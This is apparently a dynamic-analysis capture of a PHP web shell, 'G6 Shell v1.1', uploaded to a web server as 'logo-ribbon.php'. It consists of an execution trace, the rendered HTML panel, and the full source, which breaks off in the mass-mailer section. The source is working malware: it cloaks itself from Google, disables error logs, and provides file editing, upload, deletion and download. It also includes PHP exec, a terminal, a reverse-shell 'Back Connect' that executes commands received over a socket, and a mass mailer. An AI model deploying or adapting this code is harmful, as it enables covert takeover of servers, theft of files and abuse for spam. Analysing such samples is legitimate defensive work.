1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 3
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 4
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 5
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 6
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 7
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 8
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	115	$NavLink = 9
1		A						/var/www/html/uploads/logo-ribbon.php	116	$linknames = FALSE
1		A						/var/www/html/uploads/logo-ribbon.php	117	$linkurls = TRUE
2	12	0	0.001533	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	120	2	'http://localhost/uploads/logo-ribbon.php'	'readfile'
2	12	1	0.001548	523632
2	12	R			FALSE
2	13	0	0.001561	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	139	2	'http://localhost/uploads/logo-ribbon.php'	'aGk'
2	13	1	0.001576	523632
2	13	R			FALSE
2	14	0	0.001588	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	204	2	'http://localhost/uploads/logo-ribbon.php'	'YmNrbmV0'
2	14	1	0.001603	523632
2	14	R			FALSE
2	15	0	0.001615	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	229	2	'http://localhost/uploads/logo-ribbon.php'	'bWtmbA'
2	15	1	0.001629	523632
2	15	R			FALSE
2	16	0	0.001641	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	235	2	'http://localhost/uploads/logo-ribbon.php'	'bWtkaXI'
2	16	1	0.001655	523632
2	16	R			FALSE
2	17	0	0.001667	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	250	2	'http://localhost/uploads/logo-ribbon.php'	'ZmlsZV9leHBsb3Jlcg'
2	17	1	0.001682	523632
2	17	R			FALSE
2	18	0	0.001695	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	356	2	'http://localhost/uploads/logo-ribbon.php'	'downlfile'
2	18	1	0.001709	523632
2	18	R			FALSE
2	19	0	0.001721	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	400	2	'http://localhost/uploads/logo-ribbon.php'	'kueqymass'
2	19	1	0.001735	523632
2	19	R			FALSE
2	20	0	0.001747	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	409	2	'http://localhost/uploads/logo-ribbon.php'	'delete'
2	20	1	0.001761	523632
2	20	R			FALSE
2	21	0	0.001773	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	412	2	'http://localhost/uploads/logo-ribbon.php'	'c3J2aW5mbw'
2	21	1	0.001787	523632
2	21	R			FALSE
2	22	0	0.001799	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	433	2	'http://localhost/uploads/logo-ribbon.php'	'dGVybWlhbmw'
2	22	1	0.001813	523632
2	22	R			FALSE
2	23	0	0.001825	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	462	2	'http://localhost/uploads/logo-ribbon.php'	'a253aXN1ZQ'
2	23	1	0.001839	523632
2	23	R			FALSE
2	24	0	0.001851	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	476	2	'http://localhost/uploads/logo-ribbon.php'	'?eval'
2	24	1	0.001865	523632
2	24	R			FALSE
2	25	0	0.001877	523560	strstr	0		/var/www/html/uploads/logo-ribbon.php	499	2	'http://localhost/uploads/logo-ribbon.php'	'?srmve'
2	25	1	0.001890	523632
2	25	R			FALSE
2	26	0	0.001903	523560	get_srv_info	1		/var/www/html/uploads/logo-ribbon.php	513	0
2	26	1	0.001917	523560
2	27	0	0.001924	523560	ob_flush	0		/var/www/html/uploads/logo-ribbon.php	519	0
2	27	1	0.001942	523672
2	27	R			TRUE
1	3	1	0.001957	523672
			0.001991	342448
TRACE END   [2023-02-12 19:33:47.788836]


Generated HTML code

<html><head><style stype="text/css">
.flink{font-weight:normal;}
body{background-color:#101010;  background:#101010;color:#f2f2f2;font-family:tahoma;font-size:12px;}
body a{ color:#3467BA;font-weight:bold;text-decoration:none;}
body a:hover{text-decoration:underline;}
#main_content{border:1px solid #5C7296;overflow:hidden;width:1000px;height:auto;padding:15px;margin: 0 auto;background:#0A0A0A;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.enabled{color:#7ACC29;}
.enabled a{color:#7ACC29;font-weight:normal;}
.disabled{color:#CC0000;}
.execbox{width:250px;padding: 5px 15px 15px 15px;height:auto;border:solid 1px #47A3FF;background:#0A0A0A;}
.viewsource{border:solid 1px #47A3FF;background:#0A0A0A;color:#f2f2f2;}
.command{width:620px;border:solid 1px #47A3FF;outline:none;background:#0A0A0A;color:#f2f2f2;}
.response{width:616px;color:green;height:300px;border-bottom:solid 1px #47A3FF;border-right:solid 1px #47A3FF;border-left:solid 1px #47A3FF;border-top:0;outline:none;background:#0A0A0A;color:#f2f2f2;margin:-4px 0px 0px 0px;}
.TableHeader_Name{width:450px;padding:0px 0px 0px 5px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-left-radius:4px;-moz-border-top-left-radius:4px;-webkit-border-top-left-radius:4px;}
.TableHeader{width:100px;height:25px;font-weight:bold;font-family:verdana;text-align:center;background-color:#282828;}
.TableHeaderoptions{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.filesize{color:green;text-align:center;}
.filenames a{font-weight:normal;text-decoration:none;}
.filenames a:hover{text-decoration:underline;}
tr{background-color: #080808;}
tr:hover{background-color:#282828;}
#options{font-weight:200;font-family:tahoma;margin-left:10px;display:block;}
#title{font-size:25px;font-weight:bold;font-family:arial;display:block;padding:15px 0px 0px 0px;}
.Logo{font-size:150px;text-align:center;color:#101010;}
.logotext{font-size:20px;text-align:center;color:#101010;}
.terminaltop{background-color:#686868;margin:-10px 0px -3px 0px;width:622px;height:20px;border-top-right-radius:5px;-moz-border-top-right-radius:5px;-webkit-border-top-right-radius:5px;border-top-left-radius:5px;-moz-border-top-left-radius:5px;-webkit-border-top-left-radius:5px;}
.TableHeaderoptions2{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.box{padding:10px;background-color:#292929;border:1px solid #3467BA;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.box2{padding:5px;background-color:#000000;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.optionstr td{background-color:#0A0A0A;}
.optionstr td:hover{background-color:#0A0A0A;}
.chdir{background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;}
.godir{margin:0px 10px 0px -5px;background-color:#292929;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;width:24px;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;}
</style>
</head><body>
        <div id="main_content">
<title>G6 Shell v1.1 - Private .::Made By Mr. P-teo::.</title><a href="?">Main</a> / <a href="?c3J2aW5mbw=">Server Information</a> / <a href="?ZmlsZV9leHBsb3Jlcg=/var/www/html/">File Explorer</a> / <a href="?dGVybWlhbmw">Terminal</a> / <a href="?aGk=">Hash Identifier</a> / <a href="?eval">PHP Exec</a> / <a href="?YmNrbmV0=">Back Connect</a> / <a href="?kueqymass">Mass Mailer</a> / <a href="?a253aXN1ZQ">Shell-101</a> / <a href="?srmve">Self Remove</a> / <br><span id="title">G6 Shell v1.1 - Private</span><br><div class="box"><b>Server Name: </b>localhost<br>
        <b>Server IP: </b>::1 <span class="enabled"><a href="http://www.who.is/whois/localhost" target="_blank">[WHOIS]</a> - <a href="http://www.dnsstuff.com/tools?runFromMain=::1&amp;toolType=traceroute" target="_blank">[TRACEROUTE]</a></span><br><b>Shell Location: </b>/var/www/html/logo-ribbon.php<br>
        <b>Server Software: </b>Apache/2.4.52 (Ubuntu) <span class="enabled"><a href="http://www.exploit-db.com/search/?action=search&amp;filter_page=1&amp;filter_description=Apache/2.4.52 (Ubuntu)&amp;filter_exploit_text=&amp;filter_author=&amp;filter_platform=0&amp;filter_type=0&amp;filter_lang_id=0&amp;filter_port=&amp;filter_osvdb=&amp;filter_cve=" target="_blank">[Exploit DB]</a></span><br>
        </div><br><br><p></p>        <br><br><br><br><div class="Logo">G6 v1.1</div><div class="logotext">Private Shell Coded By Mr. P-teo</div><br><br><br>
        </div>

</body></html>

Original PHP code

<style stype="text/css">
.flink{font-weight:normal;}
body{background-color:#101010;  background:#101010;color:#f2f2f2;font-family:tahoma;font-size:12px;}
body a{ color:#3467BA;font-weight:bold;text-decoration:none;}
body a:hover{text-decoration:underline;}
#main_content{border:1px solid #5C7296;overflow:hidden;width:1000px;height:auto;padding:15px;margin: 0 auto;background:#0A0A0A;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.enabled{color:#7ACC29;}
.enabled a{color:#7ACC29;font-weight:normal;}
.disabled{color:#CC0000;}
.execbox{width:250px;padding: 5px 15px 15px 15px;height:auto;border:solid 1px #47A3FF;background:#0A0A0A;}
.viewsource{border:solid 1px #47A3FF;background:#0A0A0A;color:#f2f2f2;}
.command{width:620px;border:solid 1px #47A3FF;outline:none;background:#0A0A0A;color:#f2f2f2;}
.response{width:616px;color:green;height:300px;border-bottom:solid 1px #47A3FF;border-right:solid 1px #47A3FF;border-left:solid 1px #47A3FF;border-top:0;outline:none;background:#0A0A0A;color:#f2f2f2;margin:-4px 0px 0px 0px;}
.TableHeader_Name{width:450px;padding:0px 0px 0px 5px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-left-radius:4px;-moz-border-top-left-radius:4px;-webkit-border-top-left-radius:4px;}
.TableHeader{width:100px;height:25px;font-weight:bold;font-family:verdana;text-align:center;background-color:#282828;}
.TableHeaderoptions{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.filesize{color:green;text-align:center;}
.filenames a{font-weight:normal;text-decoration:none;}
.filenames a:hover{text-decoration:underline;}
tr{background-color: #080808;}
tr:hover{background-color:#282828;}
#options{font-weight:200;font-family:tahoma;margin-left:10px;display:block;}
#title{font-size:25px;font-weight:bold;font-family:arial;display:block;padding:15px 0px 0px 0px;}
.Logo{font-size:150px;text-align:center;color:#101010;}
.logotext{font-size:20px;text-align:center;color:#101010;}
.terminaltop{background-color:#686868;margin:-10px 0px -3px 0px;width:622px;height:20px;border-top-right-radius:5px;-moz-border-top-right-radius:5px;-webkit-border-top-right-radius:5px;border-top-left-radius:5px;-moz-border-top-left-radius:5px;-webkit-border-top-left-radius:5px;}
.TableHeaderoptions2{padding:0px 0px 0px 15px;width:170px;height:25px;font-weight:bold;font-family:verdana;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
.box{padding:10px;background-color:#292929;border:1px solid #3467BA;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.box2{padding:5px;background-color:#000000;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
.optionstr td{background-color:#0A0A0A;}
.optionstr td:hover{background-color:#0A0A0A;}
.chdir{background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;}
.godir{margin:0px 10px 0px -5px;background-color:#292929;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;width:24px;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;}
</style>
<body>
        <div id="main_content">
<?php
ob_start();
ini_set('display_errors', false);
ini_set('memory_limit', '-1');
 
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
 
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
echo "<title>G6 Shell v1.1 - Private .::Made By Mr. P-teo::.</title>";
 
function get_srv_info(){
 
        echo "<br /><span id='title'>G6 Shell v1.1 - Private</span><br /><div class='box'><b>Server Name: </b>".$_SERVER["SERVER_NAME"]."<br />
        <b>Server IP: </b>".$_SERVER["SERVER_ADDR"]." <span class='enabled'><a href='http://www.who.is/whois/".$_SERVER['HTTP_HOST']."' target='_blank'>[WHOIS]</a> - <a href='http://www.dnsstuff.com/tools?runFromMain=".$_SERVER["SERVER_ADDR"]."&toolType=traceroute' target='_blank'>[TRACEROUTE]</a></span><br />".
        "<b>Shell Location: </b>".$_SERVER["SCRIPT_FILENAME"]."<br />
        <b>Server Software: </b>".$_SERVER["SERVER_SOFTWARE"]." <span class='enabled'><a href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$_SERVER['SERVER_SOFTWARE']."&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=' target='_blank'>[Exploit DB]</a></span><br />
        </div><br /><br /><p></p>";
}
 
function cmd(){
        $disabled = explode(', ', ini_get('disable_functions'));
        $diabledLower = array();
        foreach($diabled as $function){$diabledLower[] = strtolower($function);}
        if(!in_array($diabledLower, "exec")){return "exec";     }elseif(!in_array($diabledLower, "passthru")){return "passthru";}elseif(!in_array($diabledLower, "system")){return "system";}else{return "none";}}
        $shellVersion = "1.1";
 
$upload = $_GET['dXBsb2Fk'];
$downloadfilename = $_GET['ZG93bg'];
$delete = $_GET['delete'];
$file_explorer = $_GET['ZmlsZV9leHBsb3Jlcg'];
$mkdir = $_GET['bWtkaXI'];
$currentDirectoryFileDl = $_GET['downlfile'];
$NavLinks = array(
        array(
                "name" => "Main",
                "url" => "?"
        ),
        array(
                "name" => "Server Information",
                "url" => "?c3J2aW5mbw="
        ),
        array(
                "name" => "File Explorer",
                "url" => "?ZmlsZV9leHBsb3Jlcg=".dirname(__FILE__)."/"
        ),
        array(
                "name" => "Terminal",
                "url" => "?dGVybWlhbmw"
        ),
        array(
                "name" => "Hash Identifier",
                "url" => "?aGk="
        ),
        array(
                "name" => "PHP Exec",
                "url" => "?eval"
        ),
        array(
                "name" => "Back Connect",
                "url" => "?YmNrbmV0="
        ),
        array(
                "name" => "Mass Mailer",
                "url" => "?kueqymass"
        ),
        array(
                "name" => "Shell-101",
                "url" => "?a253aXN1ZQ"
        ),
        array(
                "name" => "Self Remove",
                "url" => "?srmve"
        )
);
$CurrentUrl = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$last = count($NavLinks) - 1;
foreach($NavLinks as $NavLink => $NavRow){
        $linknames = ($NavLink == 0);
    $linkurls = ($NavLink == $last);
        echo '<a href="'.$NavRow['url'].'">'.$NavRow['name'].'</a> / ';
}
if(strstr($CurrentUrl, "readfile")){
                $sourcefile = $_REQUEST['readfile'];
                if(is_file($sourcefile)){
        get_srv_info();
        if(isset($sourcefile))
        {
            $Finalsource = file_get_contents($sourcefile);             
 
                echo "<strong>Editing: </strong>".$sourcefile."<br /><br /><a href='".$_SERVER['HTTP_REFERER']."'>&laquo; Back to files</a><br /><form action='' method='POST'><textarea name='sourcecode' class='viewsource' rows='20' cols='121'>".htmlentities($Finalsource)."</textarea><br /><input type='Submit' value='Save File' name='save' /></form>";
                }
                }else{
                        echo "Data not sent.";
                }
                if(isset($_POST['save'])){
                        $new_source = $_POST['sourcecode'];
                        $source_edit = fopen($sourcefile, 'w');
                        fwrite($source_edit, $new_source);
                        fclose($source_edit);
                }
}elseif(strstr($CurrentUrl, "aGk")){
        get_srv_info();
        echo "<p>G6 hash identifier is able to identify MD5, SHA-1, MySQL5, DES(Unix), SHA-256, SHA-384, SHA-512, MD5(Unix), MD5(APR), MD5(phpBB3), MD5(Wordpress), SHA-256(Unix), SHA-512(Unix) and MD5(Base-64).</p>";
        if(isset($_POST['gethash'])){
                $hash = $_POST['hash'];
                if(strlen($hash)==32){
                        $hashresult == "MD5 Hash";
                }elseif(strlen($hash)==40){
                        $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
                }elseif(strlen($hash)==13){
                        $hashresult = "DES(Unix) Hash";
                }elseif(strlen($hash)==16){
                        $hashresult = "MySQL Hash / /DES(Oracle Hash)";
                }elseif(strlen($hash)==41){
                        $GetHashChar = substr($hash, 40);
                        if($GetHashChar == "*"){
                                $hashresult = "MySQL5 Hash";
                        }      
                }elseif(strlen($hash)==64){
                        $hashresult = "SHA-256 Hash";
                }elseif(strlen($hash)==96){
                        $hashresult = "SHA-384 Hash";
                }elseif(strlen($hash)==128){
                        $hashresult = "SHA-512 Hash";
                }elseif(strlen($hash)==34){
                        if(strstr($hash, '$1$')){
                                $hashresult = "MD5(Unix) Hash";
                        }      
                }elseif(strlen($hash)==37){
                        if(strstr($hash, '$apr1$')){
                                $hashresult = "MD5(APR) Hash";
                        }      
                }elseif(strlen($hash)==34){
                        if(strstr($hash, '$H$')){
                                $hashresult = "MD5(phpBB3) Hash";
                        }      
                }elseif(strlen($hash)==34){
                        if(strstr($hash, '$P$')){
                                $hashresult = "MD5(Wordpress) Hash";
                        }      
                }elseif(strlen($hash)==39){
                        if(strstr($hash, '$5$')){
                                $hashresult = "SHA-256(Unix) Hash";
                        }      
                }elseif(strlen($hash)==39){
                        if(strstr($hash, '$6$')){
                                $hashresult = "SHA-512(Unix) Hash";
                        }      
                }elseif(strlen($hash)==24){
                        if(strstr($hash, '==')){
                                $hashresult = "MD5(Base-64) Hash";
                        }      
                }else{
                        $hashresult = "Hash type not found";
                }
        }else{
                $hashresult = "Not Hash Entered";
        }
        ?>
        <center>
                <form action="" method="POST"><table><tr class="optionstr"><td>Enter Hash:</td> <td><input type="text" name="hash" class="command" /></td><td><input type="submit" name="gethash" value="Identify Hash" /></td></tr><tr class="optionstr"><td>Result: </td><td><?php echo $hashresult; ?></td></tr></table></form>
        </center>
       
        <?php
 
}elseif(strstr($CurrentUrl, "YmNrbmV0")){
        get_srv_info();
        echo '
<div id="back">
           <h2>Back Connect</h2>
           <p>Back connect will allow you to enter system commands remotely.</p>
           <p>
           <table>
                                <form action="" method="post">
                                <tr class="optionstr"><td>IP Address: </td><td><input type="textbox" name="ip" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
                                <tr class="optionstr"><td>Port: </td><td><input type="textbox" name="port" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
                                <tr class="optionstr"><td><input type="submit" name="bind" value="Open Connection" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
                                </form>
                                </table>';
                                if(isset($_POST['bind']))
                                        {
                                                echo "<p>Attempting Connection...</p>";
                                                $ip = $_POST['ip'];
                                                $port= $_POST['port'];
                                                $sockfd=fsockopen($ip , $port , $errno, $errstr );
                                                if($errno != 0){echo "<font color='red'><b>$errno</b> : $errstr</font>";}else if (!$sockfd)     {$result = "<p>Unexpected error has occured, connection may have failed.</p>";} else {fputs ($sockfd ,"\n{################################################################}\n..:: G6 W3b Sh3ll v1.1- Coded By Mr. P-teo ::..\n\n=> Backconnect \n=> Back        \n
                                                         \n{################################################################}"); $pwd = shell_exec("pwd"); $sysinfo = shell_exec("uname -a"); $time = Shell_exec("time"); $len = 1337; fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n"); while(!feof($sockfd)){ $cmdPrompt = '[G6]#:> ';fputs ($sockfd , $cmdPrompt );$command= fgets($sockfd, $len);
                                                        fputs($sockfd , "\n" . shell_exec($command) . "\n\n"); } fclose($sockfd);}}
                echo "</p></div>";
 
}elseif(strstr($CurrentUrl, "bWtmbA")){
        get_srv_info();
        echo "<p>If no file path is included it will be created within the same directory as the shell.</p><form action='' method='post'><p>Filename: <input type='text' name='newfilename' /></p><p><input type='submit' value='Create File' name='create' /></p></form>";
                $newfilename = htmlentities($_POST['newfilename']);
        if(isset($_POST['create'])){$ourFileName = $newfilename;$ourFileHandle = fopen($ourFileName, 'w') or die("can't open file");fclose($ourFileHandle);}
        echo "<br /><br />";
}elseif(strstr($CurrentUrl, "bWtkaXI")){
        get_srv_info();
        echo "<p>If no file path is included directory will be created within the same directory as the shell.</p>
                <form action='' method='post'>
                <p>Directory Name: <input type='text' name='newdirname' /></p>
                <p><input type='submit' value='Create New Directory' name='createdir' /></p>
                </form>";
        $newdirname = htmlentities($_POST['newdirname']);
        if(isset($_POST['createdir'])){
                $ourdirName = $newdirname;
                mkdir($ourdirName, 0777);
                echo "Directory Created!";
        }
        echo "
                <br /><br />";
}elseif(strstr($CurrentUrl, "ZmlsZV9leHBsb3Jlcg")){
                get_srv_info();
                $upload = $file_explorer;
                echo '<p><form action="" method="POST"><table><tr class="optionstr"><td><input class="chdir" type="text" name="chdir" value="'.$file_explorer.'"" /></td><td></td></form><td><div id="options"><a href="'.$CurrentUrl.'">Refresh Files</a></div></td><td><div id="options"><!--<a href="?bWtkaXI='.$file_explorer.'">Make Directory</a> | <a href="?bWtmbA='.$file_explorer.'">Make File</a> | <a href="?dXBsb2Fk='.$upload.'">Upload</a></div>--></td></tr>';
                if(isset($_POST['godir'])){$mandircha = $_POST['chdir'];if($mandircha){ header("Location: ?ZmlsZV9leHBsb3Jlcg=".$_POST['chdir']);}}
        ?>
        </div></p>
                        <table class="FileBrowserTable"><tr><td class="TableHeader_Name"> FileName's</td><td class="TableHeader">Filetype</a></td><td class="TableHeader">Size</td><td class="TableHeader">Permisions</td><td class="TableHeader">Last Modified</td><td class="TableHeaderoptions"> Options</td></tr>
                <?php
 
                $Shell_Directory = $_SERVER['REMOTE_DIR'];
                        //load files...        
 
                function GetFileType($file){
                        if(!is_dir($file)){
                                if(strstr($file, ".")){
                                        $FileExt = end(explode(".", $file));
                                        return $FileExt;
                                }else{
                                        return "Directory";
                                }
                        }else{
                                $Directory = "Directory";
                                return $Directory;
                        }
                }
 
               
 
 
function GetFileSize($file){
        if(!is_dir($file))
                return round(filesize($file) / 1024, 2) . " Kb";
        else
                return "Not Availible";
}
 
function LastModified($file){
                return  "<center>".date("m/d/y", filemtime($file))."</center>";
}
 
function permissions($file){
        if(is_readable($file)){
                $readable = "r";
        }else{
                $readable = "?";
        }
        if(is_writable($file)){
                $writable = "w";
        }else{
                $writable = "?";
        }
        if(is_executable($file)){
                $executable = "x";
        }else{
                $executable = "?";
        }
 
 
if($readable."--".$writable."--".$executable == "r--w--x"){
        return "<center style='color:#f1f1f1;'>".$readable."--".$writable."--".$executable."</center>";
}else{
        return "<center>".$readable."--".$writable."--".$executable."</center>";
}
}
 
                $Files = scandir($file_explorer);
        foreach($Files as $File){
                if($File == ".."){
                        $currentDirectory = $_GET['ZmlsZV9leHBsb3Jlcg'];
                        //Up a directory
                        $currentDirectory = substr($currentDirectory, 0, strrpos($currentDirectory, "/"));
                        echo "<tr><td><a href='?ZmlsZV9leHBsb3Jlcg=" .$currentDirectory. "'>" . $File . "</a></td><td></td><td></td><td></td><td></td><td></td></tr>";
 
                }elseif($File == "."){
                        //Same as current Dir, no need for this...
 
                }else{
                        $currentDirectory = $_GET['ZmlsZV9leHBsb3Jlcg'];
                        $type = GetFileType($currentDirectory. "/" .$File);
                        if($type == "Directory"){
                                echo "<tr><td><a class='flink' title='Explore Directory' href='?ZmlsZV9leHBsb3Jlcg=" .$currentDirectory. "/" .$File. "'>" . $File . "/</a></td><td><center>" . $type . "</center></td><td class='filesize'>" . GetFileSize($currentDirectory. "/" .$File) . "</td><td style='color:red;'>".permissions($currentDirectory. "/" .$File)."</td><td>" . LastModified($currentDirectory. "/" .$File) . "</td><td>Not Availible</td></tr>";
                        }else{
                                echo "<tr><td><a class='flink' title='Edit File' href='?readfile=" .$currentDirectory. "/" .$File. "'>" . $File . "</a></td><td><center>" . $type . "</center></td><td class='filesize'>" . GetFileSize($currentDirectory. "/" .$File) . "</td><td style='color:red;'>".permissions($currentDirectory. "/" .$File)."</td><td>" . LastModified($currentDirectory. "/" .$File) . "</td><td><a href='?readfile=" .$currentDirectory. "/" .$File. "' title='Edit File'>E</a> - <a href='?delete=" .$currentDirectory. "/" .$File. "' title='Bin the Document'>B</a> - <a href='?downlfile=".$currentDirectory. "/" .$File."&file=".$File."' title='Download File'>D</a></td></tr>";
                        }
                }
        }
               
?>
</table>
<div style="background:#282828;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;-webkit-border-bottom-left-radius:4px;height:25px;margin:0px 0px 10px 0px;width:1000px;" ></div>
        <div style="padding:10px;background-color: #292929;border: 1px solid #3467BA;border-radius: 6px;-moz-border-radius: 6px;-webkit-border-radius: 6px;width:220px;float:left;margin:10px 10px 15px 0px;">
        <h4>File Upload</h4><form action="" method="post" enctype="multipart/form-data"><input type="file" name="file" /><br /><input type="submit" name="upload" value="Upload File" /></form></div>
        <?php
        if(isset($_POST['upload'])){if(isset($_FILES['file'])){ move_uploaded_file($_FILES["file"]["tmp_name"], $file_explorer."/". $_FILES["file"]["name"]);echo '<script>alert("File successfully uploaded, enjoy.");</script>';}     }
        ?>
        <div style="padding:10px;background-color: #292929;border: 1px solid #3467BA;border-radius: 6px;-moz-border-radius: 6px;-webkit-border-radius: 6px;width:220px;float:left;margin:10px 10px 15px 0px;">
        <h4>Create Directory</h4>
        <form action="" method="post"><input type="text" name="dirname" /><br /><input type="submit" name="createdir" value="Create Dir" /></form></div>
        <?php
                if(isset($_POST['createdir'])){if(strlen($_POST['dirname']) > 0){mkdir($file_explorer."/".$_POST['dirname'], 777) or die($file_explorer."/".$_POST['dirname']);}}
        ?>
                <br /><br /><br />
<?php
 
               
}elseif(strstr($CurrentUrl, "downlfile")){
                        /*$type = mime_content_type($currentDirectoryFileDl);
                        header('Content-Type: '.$type);
                        header('Content-Disposition: attachment; filename="'.$currentDirectoryFileDl.'"');*/
                        $file = $_GET['file'];
                        // header('Content-Type: application/force-download'); Non-standard MIME-Type, incompatible with Samsung C3050 for example. Let it commented
                        //readfile($currentDirectoryFileDl);
                        forceDL($currentDirectoryFileDl, $file);
                        /*
         * forceDL
         *
         * Forces the browser to download file
         *
         * @param string $filePath Path to the selected download
         * @param string $fileName Name of file to be saved, can be anything honestly
         */
        function forceDL($filePath, $fileName) {
                /* Rquired for IE */
                if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off');  }
               
                /*
                Files not downloading with correct headers?
                1) Open file in Notepad++ (or similar) and check for white-space or other code (php code)
                2) Extra code?
                3) Problem found.
                4) Profit
                Should answer most questions
                */
               
                /* Headers */
                header('Pragma: public');
                header('Expires: 0');
                header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
                header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($filePath)).' GMT');
                header('Cache-Control: private', false);
                header('Content-Type: application/force-download');
                header('Content-disposition: attachment; filename="' . $fileName . '"');
                header('Content-Transfer-Encoding: binary');
                header('Content-length: ' . filesize($filePath));
                readfile($filePath);
                echo $filePath.$fileName;
                exit();
        }
 
}elseif(strstr($CurrentUrl, "kueqymass")){
        get_srv_info();
        ?>
                <strong>Mass Mailer</strong>
                <p>Be warned using the mass mailing feature may attract attention to your G6 shell. Seperate each email with <strong>;</strong></p>
                <form action="" method="post">
